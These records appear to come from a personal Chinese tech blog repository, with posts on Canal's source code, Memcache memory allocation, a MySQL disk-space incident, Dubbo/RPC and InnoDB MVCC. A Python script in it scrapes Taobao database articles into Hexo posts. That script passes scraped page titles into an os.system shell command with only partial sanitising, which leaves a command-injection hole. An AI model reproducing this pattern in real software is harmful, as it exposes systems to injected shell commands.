"text": "---\ntitle: Canal系列02-Deployer模块\ndate: 2019-06-16 22:10:32\ncategories: Canal系列\ntags: [canal]\n---\n## 一、简介\n通过deployer模块,我们可以直接使用maven打出一个Canal可执行包,项目结构包括:\n\n- bin项目启动/停止/初始化脚本\n- conf项目配置文件\n- lib项目依赖jar\n- logs项目执行的日志目录\n\n## 二、源码分析\n\n- 1)Canal启动的类是CanalLauncher,通过解析配置文件,调用CanalStater.start(properties),这里CanalStater->CanalStarter,感觉可能是类名弄错了,这个类不复杂。\n- 2)CanalStater首先会判断是否是使用MQ来接收binlog的,Canal支持将binlog直接发送的kafka或者RocketMQ中。然后启动CanalController这个类的start方法。\n- 3)CanalController这个是比较复杂的类,里面包括Canal实例及嵌入式服务的启动,我在代码里加了注释方便理解。\n\n```\n// 构造方法很长\npublic CanalController(final Properties properties){\n managerClients = MigrateMap.makeComputingMap(new Function<String, CanalConfigClient>() {\n\n public CanalConfigClient apply(String managerAddress) {\n return getManagerClient(managerAddress);\n }\n });\n\n // 初始化全局参数设置,重要:instanceGenerator声明CanalInstanceGenerator如何生成\n // Spring模式下,通过配置default-instance.xml,实现CanalInstanceWithSpring的组装\n globalInstanceConfig = initGlobalConfig(properties);\n instanceConfigs = new MapMaker().makeMap();\n // 初始化instance config,将配置初始化到instanceConfigs中\n initInstanceConfig(properties);\n\n // init socketChannel\n String socketChannel = getProperty(properties, CanalConstants.CANAL_SOCKETCHANNEL);\n if (StringUtils.isNotEmpty(socketChannel)) {\n System.setProperty(CanalConstants.CANAL_SOCKETCHANNEL, socketChannel);\n }\n\n // 兼容1.1.0版本的ak/sk参数名\n String accesskey = getProperty(properties, \"canal.instance.rds.accesskey\");\n String secretkey = getProperty(properties, \"canal.instance.rds.secretkey\");\n if (StringUtils.isNotEmpty(accesskey)) {\n System.setProperty(CanalConstants.CANAL_ALIYUN_ACCESSKEY, accesskey);\n }\n if (StringUtils.isNotEmpty(secretkey)) {\n System.setProperty(CanalConstants.CANAL_ALIYUN_SECRETKEY, secretkey);\n }\n\n // 准备canal server\n cid = Long.valueOf(getProperty(properties, CanalConstants.CANAL_ID));\n ip = getProperty(properties, CanalConstants.CANAL_IP);\n port = Integer.valueOf(getProperty(properties, CanalConstants.CANAL_PORT));\n embededCanalServer = CanalServerWithEmbedded.instance();\n // 设置自定义的instanceGenerator,这里比较重要\n embededCanalServer.setCanalInstanceGenerator(instanceGenerator);\n try {\n int metricsPort = Integer.valueOf(getProperty(properties, CanalConstants.CANAL_METRICS_PULL_PORT));\n embededCanalServer.setMetricsPort(metricsPort);\n } catch (NumberFormatException e) {\n logger.info(\"No valid metrics server port found, use default 11112.\");\n embededCanalServer.setMetricsPort(11112);\n }\n // 使用Netty创建Http Server,用来接收Canal 客户端的请求\n String canalWithoutNetty = getProperty(properties, CanalConstants.CANAL_WITHOUT_NETTY);\n if (canalWithoutNetty == null || \"false\".equals(canalWithoutNetty)) {\n canalServer = CanalServerWithNetty.instance();\n canalServer.setIp(ip);\n canalServer.setPort(port);\n }\n\n // 处理下ip为空,默认使用hostIp暴露到zk中\n if (StringUtils.isEmpty(ip)) {\n ip = AddressUtils.getHostIp();\n }\n final String zkServers = getProperty(properties, CanalConstants.CANAL_ZKSERVERS);\n if (StringUtils.isNotEmpty(zkServers)) {\n // HA 模式下初始化ZK相关节点\n zkclientx = ZkClientx.getZkClient(zkServers);\n // 初始化系统目录\n zkclientx.createPersistent(ZookeeperPathUtils.DESTINATION_ROOT_NODE, true);\n zkclientx.createPersistent(ZookeeperPathUtils.CANAL_CLUSTER_ROOT_NODE, true);\n }\n\n final ServerRunningData serverData = new ServerRunningData(cid, ip + \":\" + port);\n ServerRunningMonitors.setServerData(serverData);\n // 通过ServerRunningMonitors注册destination实例的ServerRunningMonitor,通过ServerRunningListener启动\n // 每个destination的嵌入式服务embededCanalServer\n ServerRunningMonitors\n .setRunningMonitors(MigrateMap.makeComputingMap(new Function<String, ServerRunningMonitor>() {\n\n public ServerRunningMonitor apply(final String destination) {\n ServerRunningMonitor runningMonitor = new ServerRunningMonitor(serverData);\n runningMonitor.setDestination(destination);\n runningMonitor.setListener(new ServerRunningListener() {\n\n public void processActiveEnter() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n embededCanalServer.start(destination);\n if (canalMQStarter != null) {\n canalMQStarter.startDestination(destination);\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processActiveExit() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n if (canalMQStarter != null) {\n canalMQStarter.stopDestination(destination);\n }\n embededCanalServer.stop(destination);\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processStart() {\n try {\n if (zkclientx != null) {\n final String path = ZookeeperPathUtils.getDestinationClusterNode(destination,\n ip + \":\" + port);\n initCid(path);\n zkclientx.subscribeStateChanges(new IZkStateListener() {\n\n public void handleStateChanged(KeeperState state) throws Exception {\n\n }\n\n public void handleNewSession() throws Exception {\n initCid(path);\n }\n\n @Override\n public void handleSessionEstablishmentError(Throwable error) throws Exception {\n logger.error(\"failed to connect to zookeeper\", error);\n }\n });\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n public void processStop() {\n try {\n MDC.put(CanalConstants.MDC_DESTINATION, String.valueOf(destination));\n if (zkclientx != null) {\n final String path = ZookeeperPathUtils.getDestinationClusterNode(destination,\n ip + \":\" + port);\n releaseCid(path);\n }\n } finally {\n MDC.remove(CanalConstants.MDC_DESTINATION);\n }\n }\n\n });\n if (zkclientx != null) {\n runningMonitor.setZkClient(zkclientx);\n }\n // 触发创建一下cid节点\n runningMonitor.init();\n return runningMonitor;\n }\n }));\n\n // 初始化monitor机制\n autoScan = BooleanUtils.toBoolean(getProperty(properties, CanalConstants.CANAL_AUTO_SCAN));\n if (autoScan) {\n // InstanceAction完成自动扫描配置有变更时,对实例上的嵌入式服务embededCanalServer通过ServerRunningMonitor进行重启\n defaultAction = new InstanceAction() {\n\n public void start(String destination) {\n InstanceConfig config = instanceConfigs.get(destination);\n if (config == null) {\n // 重新读取一下instance config\n config = parseInstanceConfig(properties, destination);\n instanceConfigs.put(destination, config);\n }\n\n if (!embededCanalServer.isStart(destination)) {\n // HA机制启动\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (!config.getLazy() && !runningMonitor.isStart()) {\n runningMonitor.start();\n }\n }\n }\n\n public void stop(String destination) {\n // 此处的stop,代表强制退出,非HA机制,所以需要退出HA的monitor和配置信息\n InstanceConfig config = instanceConfigs.remove(destination);\n if (config != null) {\n embededCanalServer.stop(destination);\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (runningMonitor.isStart()) {\n runningMonitor.stop();\n }\n }\n }\n\n public void reload(String destination) {\n // 目前任何配置变化,直接重启,简单处理\n stop(destination);\n start(destination);\n }\n };\n // 主要是对spring模式的配置进行监控,单独启动线程每scanInterval扫描一次,\n // 通过上面的defaultAction对嵌入式的embededCanalServer进行重启\n instanceConfigMonitors = MigrateMap.makeComputingMap(new Function<InstanceMode, InstanceConfigMonitor>() {\n\n public InstanceConfigMonitor apply(InstanceMode mode) {\n int scanInterval = Integer\n .valueOf(getProperty(properties, CanalConstants.CANAL_AUTO_SCAN_INTERVAL));\n\n if (mode.isSpring()) {\n SpringInstanceConfigMonitor monitor = new SpringInstanceConfigMonitor();\n monitor.setScanIntervalInSecond(scanInterval);\n monitor.setDefaultAction(defaultAction);\n // 设置conf目录,默认是user.dir + conf目录组成\n String rootDir = getProperty(properties, CanalConstants.CANAL_CONF_DIR);\n if (StringUtils.isEmpty(rootDir)) {\n rootDir = \"../conf\";\n }\n\n if (StringUtils.equals(\"otter-canal\", System.getProperty(\"appName\"))) {\n monitor.setRootConf(rootDir);\n } else {\n // eclipse debug模式\n monitor.setRootConf(\"src/main/resources/\");\n }\n return monitor;\n } else if (mode.isManager()) {\n return new ManagerInstanceConfigMonitor();\n } else {\n throw new UnsupportedOperationException(\"unknow mode :\" + mode + \" for monitor\");\n }\n }\n });\n }\n}\n```\n\n接着调用start方法:\n\n```\npublic void start() throws Throwable {\n logger.info(\"## start the canal server[{}:{}]\", ip, port);\n // 创建整个canal的工作节点\n final String path = ZookeeperPathUtils.getCanalClusterNode(ip + \":\" + port);\n // ZK相关初始化\n initCid(path);\n if (zkclientx != null) {\n this.zkclientx.subscribeStateChanges(new IZkStateListener() {\n\n public void handleStateChanged(KeeperState state) throws Exception {\n\n }\n\n public void handleNewSession() throws Exception {\n initCid(path);\n }\n\n @Override\n public void handleSessionEstablishmentError(Throwable error) throws Exception {\n logger.error(\"failed to connect to zookeeper\", error);\n }\n });\n }\n // 优先启动embeded服务,主要注册canalInstances,使用canalInstanceGenerator.generate(destination)\n embededCanalServer.start();\n // 尝试启动一下非lazy状态的通道\n for (Map.Entry<String, InstanceConfig> entry : instanceConfigs.entrySet()) {\n final String destination = entry.getKey();\n InstanceConfig config = entry.getValue();\n // 创建destination的工作节点\n if (!embededCanalServer.isStart(destination)) {\n // HA机制启动\n // 使用构造函数中注册的runningMonitor的listener启动实例上的embededCanalServer服务\n ServerRunningMonitor runningMonitor = ServerRunningMonitors.getRunningMonitor(destination);\n if (!config.getLazy() && !runningMonitor.isStart()) {\n runningMonitor.start();\n }\n }\n\n if (autoScan) {\n instanceConfigMonitors.get(config.getMode()).register(destination, defaultAction);\n }\n }\n\n if (autoScan) {\n // 自动扫描配置,启动线程扫描配置目录,有改动就重启嵌入式实例服务\n instanceConfigMonitors.get(globalInstanceConfig.getMode()).start();\n for (InstanceConfigMonitor monitor : instanceConfigMonitors.values()) {\n if (!monitor.isStart()) {\n monitor.start();\n }\n }\n }\n\n // 启动网络接口\n if (canalServer != null) {\n canalServer.start();\n }\n}\n```\n\n## 三、嵌入式服务启动\n\n在CanalController start中调用embededCanalServer.start(destination)启动相应destination的嵌入式服务,这里在调用相应(destination)实例的start方法启动,这个实例是如果产生的?是通过CanalController中的instanceGenerator生成的,具体有两种生成方式:\n- 1)ManagerCanalInstanceGenerator()\n这种方式在阿里云内部使用\n- 2)SpringCanalInstanceGenerator()\n这种方式社区使用较多,我们以这种方式来分析\n默认使用的sprint配置文件是通过canal.properties中配置的的canal.instance.global.spring.xml = classpath:spring/file-instance.xml\n也就是file-instance.xml了,查找配置中id为\"instance\"的bean即可。\n这里是CanalInstanceWithSpring这个类,原来是调用他的start的方法,他的start的方法的实现是在父类AbstractCanalInstance中。\n\n```\npublic void start() {\n super.start();\n if (!metaManager.isStart()) {\n metaManager.start();\n }\n\n if (!alarmHandler.isStart()) {\n alarmHandler.start();\n }\n\n if (!eventStore.isStart()) {\n eventStore.start();\n }\n\n if (!eventSink.isStart()) {\n eventSink.start();\n }\n\n if (!eventParser.isStart()) {\n beforeStartEventParser(eventParser);\n eventParser.start();\n afterStartEventParser(eventParser);\n }\n logger.info(\"start successful....\");\n}\n```\n\nStart方法很明确了,调用instance中meta、alarm、store、sink、parse的start方法,接下来一个个分析相应的模块。"
},
{
"alpha_fraction": 0.8002183437347412,
"alphanum_fraction": 0.817685604095459,
"avg_line_length": 23.440000534057617,
"blob_id": "db279ceb116397709743fa0c96b897ef51e8535b",
"content_id": "4deacb0a4f3a9e00f5fe354f93de5ce29c009c36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3862,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 75,
"path": "/source/_posts/memcache.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Memcache内部原理\ndate: 2018-08-30 22:38:46\ncategories: 开源项目\ntags: [memcache,内存]\n---\n### 基本数据结构\n\n- chunk\n> 是一系列固定大小的内存空间,用于缓存数据的内存块。\n- slab\n> 用于切分为chunk的内存块,一个slabclass可挂载多个slabs\n- slabclass\n> 用于管理相同chunk大小的内存结构\n- item\n> 用于管理key/value的数据结构,一个item放于一个chunk中\n- LRU list\n> 用于管理各个slabclass的最近访问过的item, 以用于item踢出时的选择,list头部是最近访问过的item\n- hashtable\n> 用于查找数据时item寻址,对key计算hash值,再在hashtable中找到对应的item, 取出数据\n- slots list\n> 是slabclass用于管理当前class的空闲item的list, 由slabclass结构中的slots指针指向\n- Page\n> 内存分配的最小单位,默认1M,可以通过-I参数在启动时指定。如果需要申请内存时,memcached会划分出一个新的page并分配给需要的slab区域。\n\n### 常规的内存使用方式\n- 预分配\n> 可能浪费内存,是一种拿空间换时间的方式,提高速度\n- 动态分配\n> 相对来说比预分配慢点,但节约内存\n\n### memcache内存分配\n为了规避内存碎片问题,memcache使用的是Slab Allocation的预分配的方式使用内存。\n\n内存分配策略:按slab需求分配page,各slab按需使用chunk存储。\n\n> Slab Allocation是将内存按指定大小分块(chunk),将相同大小的块组成分组。默认chunk是1.25倍增加的,并且分配的内存不会释放,可以重复使用,避免内存碎片的产生。\n> \n> Memcached 在启动时通过-m参数指定最大使用内存,但memcache并不会一启动就占用这么大内存,而是根据需要逐步分配给各个slab的。\n> \n> 如果一个新的数据需要缓存时,memcached先根据数据大小选择一个合适的slab,再查看该slab是否还有空闲的chunk,有则直接存进去,否则需要slab申请一个page的内存,并切分成多个chunk,将数据存到切分出的第一个chunk中。\n>\n> 如果没有可用的内存分配给slab,系统就会触发LRU机制,通过删除冷数据来释放内存空间。\n> \n> PS:服务端维护着一个未使用的内存块的列表,所以很容易就知道slab下是否有空闲的chunk\n\n### 惰性过期机制\nmemcache内部没有提供过期检查机制,而是在get时依据记录的过期时间检查是否过期。\n默认,内部也维护一套LRU置换算法,当设定的内存满了的时候,会按照置换算法删除一些冷数据,LRU不是全局的,而是对slab而言的。\n\n### 分布式策略\n- 余数算法\n> 先key的整数散列值,再除以服务器数量,根据得到的余数确定存储的服务器。\n> \n> 优点:简单、高效;\n> \n> 缺点:当服务器增加或者减少时,几乎所有的缓存都会失效。\n- 散列算法(一致性hash)\n> - 先算出所有服务器散列值,将其分布到0~2^32的圆上\n> - 同样的方法,计算出key的散列值,并分布到上面的圆上\n> - 从key映射的位置,顺时针查找,将数据存储到查找到的第一台服务器上,大于2^32还没有找到,就存储到第一台服务器上。\n>\n> 优点:当增加或减少服务器时,只影响增加或者减少服务器的圆上位置的顺时针下一台服务器上的数据\n\nmemcache使用客户端一致性hash算法实现分布式存储。\n\n### 特性\n- memcache保存的item的数量在内存足够的情况下是没有限制的\n- key的最大长度:250字节\n- value的最大长度:1m字节\n- memcache服务端是不安全的,可以通过Telnet,flush_all将所有数据失效\n- 不能遍历所有item,很慢并且阻塞其他操作\n\n### 参考\n[深入memcached内部](http://lostphp.com/blog/564.html)"
},
{
"alpha_fraction": 0.541769802570343,
"alphanum_fraction": 0.5785890817642212,
"avg_line_length": 31,
"blob_id": "01a143262d9dc434fe31106de9da62bf4deed27e",
"content_id": "d75b3532ee70e59c7ce61665ed6ad9943cee74eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3301,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 101,
"path": "/blog.py",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport logging\nimport logging.config\nimport argparse\nimport time\nimport requests\nfrom tomd import Tomd\n\nfrom bs4 import BeautifulSoup\n\nblog_domain = \"http://mysql.taobao.org\"\n\n\ndef main_page():\n r = requests.get( blog_domain + \"/monthly/\", headers=headers)\n r.encoding='utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n # print (len(soup.select('.posts')))\n for link in soup.select('.posts')[0].find_all('a'):\n \tmonth_page(link.get('href'))\n\ndef month_page(month):\n r = requests.get(blog_domain+month, headers=headers)\n r.encoding = 'utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n # print (soup.prettify())\n for link in soup.select('.posts')[0].find_all('a'):\n href_arr = link.get('href').split('/')\n print (href_arr)\n\n if(int(href_arr[2]) > 2017):\n print(\"SKIP 2 --- \" + str(int(href_arr[2])))\n continue\n else:\n if(int(href_arr[2]) == 2017):\n if (int(href_arr[3]) > 2):\n print(\"SKIP 3 --- \"+str(int(href_arr[3])))\n continue\n if(int(href_arr[3]) == 2 and int(href_arr[4]) < 3):\n print(\"SKIP 4 --- \" + str(int(href_arr[4])))\n continue\n # print (\"--->\"+link.get('href'))\n blog(link.get('href'))\n\n\ndef blog(addr):\n r = requests.get(blog_domain+addr, headers=headers)\n r.encoding = 'utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n blog_title = soup.title.string\n file_name = blog_title.replace(' ', '-')\n file_name = file_name.replace(' ', '-')\n file_name = file_name.replace('.', '-')\n file_name = file_name.replace('/', '-')\n file_name = file_name.replace('+', '-')\n file_name = file_name.replace('_', '-')\n file_name = file_name.replace('(', '')\n file_name = file_name.replace(')', '')\n print (addr)\n # hexo new\n os.system('hexo new \"{}\"'.format(file_name))\n time.sleep(0.5);\n blog_title_arr = blog_title.split('·')\n blog_header = '''\n---\ntitle: {}\ndate: 2018-09-28 15:47:45\ncategories: [alidb-monthly, {}, {}]\ntags: [{}, {}]\n---\n '''.format(blog_title, blog_title_arr[0].strip(), blog_title_arr[1].strip(), blog_title_arr[0].strip(), blog_title_arr[1].strip())\n blog_footer = '''\n\n## 郑重声明\n> 文章来自淘宝技术博客 [数据库内核月报](http://mysql.taobao.org/monthly/2017/04/01/)\n> \n> 本人为了学习方便而分类整理\n\n '''\n # print (soup.select('.post')[0].prettify())\n # print (blog_header + Tomd(str(soup.select('.post')[0])).markdown)\n write_file(file_name + '.md', blog_header + Tomd(str(soup.select('.post')[0])).markdown + blog_footer)\n\ndef write_file(file_name, content):\n file_path = './source/_posts/'\n with open(file_path+file_name, 'wt') as f:\n f.truncate()\n f.write(content)\n\nif __name__ == '__main__':\n headers = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'X-DevTools-Emulate-Network-Conditions-Client-Id': '853B53D93401C5EACDE50E409FCB0612', 'Upgrade-Insecure-Requests': '1'}\n # blog('/monthly/2018/07/02/')\n main_page()\n\n\n\n# vim: set expandtab ts=4 sts=4 sw=4 :\n"
},
{
"alpha_fraction": 0.44155845046043396,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 11.833333015441895,
"blob_id": "ab134abbe8443490d6d4e049ee0707ee97c48c9f",
"content_id": "98cb4aa32eede2a69505f1d50e55300393a882bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/tags/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\n# title: tags\ndate: 2018-08-04 14:19:48\ntype: \"tags\"\ncomments: false\n---\n"
},
{
"alpha_fraction": 0.802247166633606,
"alphanum_fraction": 0.8297752737998962,
"avg_line_length": 24.44285774230957,
"blob_id": "27254f7065c72cbabba9fc005fcb4ca801532567",
"content_id": "250a41081fc023a79cd271f07a66781d04e459fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4510,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 70,
"path": "/source/_posts/creatives.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 【救火篇】业务数据存储设计问题引起的事故\ndate: 2018-08-18 23:36:34\ncategories: Design\ntags: [数据结构设计,表格存储,]\n---\n\n### 写在前面\n> 隔了很久没有更新博客了,这两周一直在忙着处理线上的一个存储故障,设计新的存储方案。现将大概的处理方式记录到博客中,真实的故障情况和新的存储设计文档,不便公开。\n>\n> 写设计文档过程中,真实感觉到自己从开始写博客这几个月来,有了进步。文档排版、组织、问题描述等等明显比之前好了很多。技术文档也像写代码一样,需要精心设计、组织~\n\n### 事故起因\n业务数据库(阿里云RDS)磁盘每天增长50G+,而且持续增长,总空间占用达到85%以上,急需扩容。\n\n### 分析磁盘占用情况\n- 通过分析RDS binlog定位到写入量比较大的四张表;\n- 通过阿里云DMS控制台,统计占用磁盘空间最大的几张表,跟binlog中定位的表一致;\n> 大概定位占用空间比较大的几个表,接着就开始分析这几张表的结构\n\n### 表结构分析\n> 针对这几张大表,分析其字段,发现表结构存在以下几个问题\n\n- 1)字段太多\n\t> 一张表将近40个字段\n\n- 2)字段类型选择不合适\n\t> 类似枚举类型的状态字段,使用int类型\n\n- 3)业务库存在Text类型字段\n\t> 其实页面上没有使用\n\n- 4)数据庸余太严重\n\t> 这个最为严重,为了一个需要统计的数据,而把整条记录这么多字段,并且有Text大字段,写两份,造成至少一倍的空间浪费\n\n### 临时解决方案\n\n首先,可以确定第4个问题,是最浪费空间,解决掉就可以释放一半的磁盘空间。\n\n于是,想办法将两条相同的业务数据(分两个表存储的),通过分析整合到一条上,删除另一个表中的记录。这样,离线操作就可以实现,又对线上业务基本没有影响。\n\n本想先将磁盘空间降下来,腾出时间,再针对其他问题做进一步的优化。\n\n### 接下来的问题\n\n通过上面的临时方案,业务端删掉了将近一半的数据。问题是MySQL的Delete操作并不会释放磁盘空间,需要对表执行Optimize操作,才能清理磁盘碎片,将空间释放。\n\n于是我们就准备对表执行Optimize操作,由于Optimize会锁表,所以需要停止写操作。\n\n从库上执行Optimize操作释放了300G+的空间,但主库上Optimize执行14个小时都没有完成,也没有释放出多少空间来,一直卡在那。\n\n通过跟阿里云技术咨询,MySQL对表执行Optimize操作整理碎片,需要临时空间,而我们主库的空间不够,所以一直卡在那。\n\n### 数据压力\n\n主库Optimize操作执行不动,后端数据又源源不断的有新数据进入。而且主库iops很高,sql执行比较慢。\n\n这个时候,为了不影响业务,我们想到两种方案:\n- 1)新建一个实例,把从库同步到新的实例上,然后drop掉原来的主库。\n> 这样,由于业务端&后端还有新的数据进入,所以需要先做一次主从切换,然后同步数据完成后,再将主从切换回原来的状态\n- 2)将主库再扩容,等新的存储方案设计并实现后,主库drop表来释放空间\n\n### 问题解决---空间释放\n起初是打算先将主库的磁盘空间释放,为新的设计开发争取时间,但Optimize执行不动,之前清理的庸余数据的空间释放不了,所以,只能采用上面列出的方案。\n\n第一种方案是可以彻底解决问题,但需要重新创建实例,并且同步从库全部数据(将近600G)也需要比较长的时间。再者,本身现在的方案是临时解决问题的方案,没有必要做这么复杂的数据同步和主从切换。\n\n于是,选择第二种方案,先维持现状,不能影响线上业务,扩容主库磁盘空间,为新的存储设计方案争取大概2周的时间。由于主库的磁盘iops比较高,sql执行比较慢,目前iops最大600,主库的iops使用一直处在700到800之间,处于超负荷的状态,所以这次也升级了下iops到1200。\n\n接下来,好消息到了。扩容了磁盘,升级了iops,当前后端数据可以放心入库了。并且由于剩余空间大了,iops也升级了,Optimize表执行也(“出乎意料的”)成功了,最终庸余的磁盘空间也释放掉了,终于可以安心设计新的存储方案了。"
},
{
"alpha_fraction": 0.510869562625885,
"alphanum_fraction": 0.6847826242446899,
"avg_line_length": 14.333333015441895,
"blob_id": "0a73f8af8494ba6b197191265671343ad60f6237",
"content_id": "e4bc9793cae92c178241223ff90d64ebffb48d6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/_posts/dubbo02.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: [Dubbo系列01]了解RPC\ndate: 2019-07-28 21:21:04\ncategories: Dubbo系列\ntags: [Dubbo]\n---\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7199297547340393,
"avg_line_length": 27.5,
"blob_id": "19dee274f0bfba343c43a94cc007d26f8c5ecfe1",
"content_id": "df8f613022044995b934d5a05aee7cdc8eb2851d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2431,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 40,
"path": "/source/_posts/MySql概述.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySql概述\ndate: 2018-01-22 19:23:37\ncategories: MySQL\ntags: [MySQL,MVCC]\n---\n\n** 并发控制: **\n通过读写锁实现;提高共享资源并发性的方式:锁的粒度(不同的锁策略)\nMySQL锁策略:\n表锁 & 行锁\n\n--------------------------------------------------------------------------------\n\n** 死锁: ** \nInnoDB将持有最少排他锁的事务回滚\n\n不同表使用合适的存储引擎很重要\n\n--------------------------------------------------------------------------------\n\n** MVCC多版本并发控制 ** \n行级锁的一个变种;开销更低;各种存储引擎的实现机制不同,但大都实现了非阻塞的读操作,写操作只锁定必要行;\n\nMVCC通过保存数据在某个时间点的快照实现;\n\nInnoDB的MVCC实现:\n通过在每行记录后面增加两个隐藏的列实现:一个行的创建时间;一个行的过期时间;(实际上不是时间而是版本号)\n\nInnoDB Repeatable Read隔离级别下MVCC的具体操作如下:\nSelect:InnoDB根据下面两个条件检查每行记录:\n 1. 只查找版本早于当前事务版本的数据行(也就是,行的系统版本号小于或等于事务的系统版本号),这样可以确保事务读取的行,要么在事务开始前已经存在,要么是事务自身插入或者修改过的;\n 2. 行的删除版本要么未定义,要么大于当前事务版本号;这可以确保事务读取到的行,在事务开始之前未被删除;\nInsert:InnoDB未插入的每行保存当前系统版本号作为行版本号;\nDelete:InnoDB为删除的每行保存当前系统版本号作为行删除标识;\nUpdate:InnoDB为插入一行新记录,保存当前系统版本号作为行版本号,同时保存当前系统版本号到原来的行作为删除标识;\n保存这两个额外的系统版本号,使得大多数读操作都不用加锁,这样使得读操作很简单,性能很好,且能保证只读到符合标准的行;不足是每行记录都需要额外的存储空间,需要更多的行检查和维护;\nMVCC只在Repeatable Read和Read Commited两个隔离级别下工作,其他两个都和MVCC不兼容;(Read Uncommitted总是读取最新行,Serializable对所有行都加锁)\n\n间隙锁(Next-Key Locking)防止幻读;(不仅仅锁定查询涉及的行,还会对索引中的间隙进行锁定,防止幻影行的插入)"
},
{
"alpha_fraction": 0.8396464586257935,
"alphanum_fraction": 0.8554292917251587,
"avg_line_length": 25.41666603088379,
"blob_id": "a27b6c80df9c5c2f12608eb6e95f2b012e45548a",
"content_id": "80aef14d2b69559f2bbbe361b11f6d36dc3f82b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3482,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 60,
"path": "/source/_posts/dubbo01.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 【Dubbo系列01】了解RPC\ndate: 2019-07-28 21:49:34\ncategories: Dubbo系列\ntags: [Dubbo]\n---\n\n7月底,自从上个月使用和研究Canal相关技术原理,这个月都在利用工作之余研究Dubbo相关技术,但一直没有写Dubbo相关博客,是因为Dubbo涉及的技术点比较多,自己对Dubbo没有一个整体的脉络,感觉不知道从哪里开始动笔。\n\n月初的时候慢慢开始研究服务治理相关的技术,于是开始了Dubbo学习,其实,在刚毕业那会已经对Dubbo有所了解,只是停留在使用层面。加上中间在创业公司使用Python技术栈,所以一直没有深入学习,这次开始决定深入学习下Dubbo及微服务领域的技术。\n\n经过大概一个月的时间,基本了解了Dubbo涉及的各个技术点,月末也对一月的学习做个总结,也为下个月的学习开个头。对Dubbo有个了大概的轮廓,在接下来一个月准备对Dubbo相关技术点及原理分别深入学习研究。\n\n## 一、定义\nRPC是指远程过程调用,它跟方法调用的区别在于是否是在同一个JVM下。\n\n## 二、面临的问题\n既然RPC调用不是在同一个JVM里面,那就面临着下面几个问题:\n- 通讯问题\n客户端和服务端需要通过网络(TCP)进行通讯,使用长链接或者短连接等。\n- 寻址问题\n客户端和服务端需要通过某种协议,约定好客户端通过RPC可以正确的调用到服务端的相应方法。\n- 网络传输问题\n客户端和服务端需要解决参数和返回结果如何在网络上传输的问题,也就是序列化和反序列化。\n\n## 三、RPC框架\n- Apache Dubbo\n阿里巴巴开源的一个Java高性能优秀的服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring框架无缝集成。\n- Motan\n新浪微博开源的一个Java 框架。\n- rpcx\nGo语言生态圈的Dubbo, 比Dubbo更轻量,实现了Dubbo的许多特性,借助于Go语言优秀的并发特性和简洁语法,可以使用较少的代码实现分布式的RPC服务。\n- grpc\nGoogle开发的高性能、通用的开源RPC框架,其由Google主要面向移动应用开发并基于HTTP/2协议标准而设计,基于ProtoBuf(Protocol Buffers)序列化协议开发,且支持众多开发语言。\n- thrift\nApache的一个跨语言的高性能的服务框架。\n\n## 四、Dubbo架构\n\n\n\n从架构图可以了解到,Dubbo主要包括5个角色:\n- Provider\n服务提供者,暴露服务。\n- Consumer\n服务消费者,调用远程服务。\n- Registry\n注册中心,服务注册、发现中心。\n- Container\n服务运行容器\n- Monitor\n服务监控中心,服务消费者& 服务提供者需要定时向Monitor汇报调用次数、调用时间等。\n\n#### 具体流程:\n0:Container负责启动,加载,运行服务提供者\n1:Provider启动时,向Registry注册自己提供的服务\n2:Consumer启动时,向Registry订阅自己关注的服务\n3:Registry返回给Consumer关注的Provider地址,如果有变更,Registry基于长链接推送变更数据给Consumer\n4:Consumer从Provider地址列表中,基于软负载均衡策略,选一台Provider进行远程调用,如果调用失败,则根据相应策略(failover、failfast等)重试其他Provider或者抛异常\n5:Consumer和Provider,在内存中累计调用次数和调用时间,定时发送统计数据给Monitor"
},
{
"alpha_fraction": 0.516853928565979,
